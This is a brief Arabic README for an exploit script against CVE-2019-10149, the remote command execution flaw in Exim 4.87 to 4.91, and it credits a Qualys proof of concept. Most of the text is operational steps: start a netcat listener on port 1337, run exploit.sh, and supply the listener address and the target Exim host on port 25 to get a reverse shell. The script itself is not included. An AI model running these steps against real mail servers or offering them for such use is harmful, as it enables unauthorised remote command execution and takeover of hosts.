
تنفيذ أوامر عن بُعد داخل الصدفة من خدمة exim ضعيفة.
تنفيذ أوامر عن بُعد في الصدفة من خدمة exim ضعيفة.
الإصدارات الضعيفة تتراوح من 4.87 إلى 4.91 (شاملة). تحقق من https://nvd.nist.gov/vuln/detail/cve-2019-10149.
يعتمد السكريبت التالي على Qualys PoC. تحقق من https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html.
يُنصح باستخدام طرفيتين
T1 $ nc -nlvp 1337
T2 $ bash exploit.sh
$ Listener IP: 192.168.0.1
$ Listener Port: 1337
$ Exim IP: 10.10.0.1
$ Exim Port: 25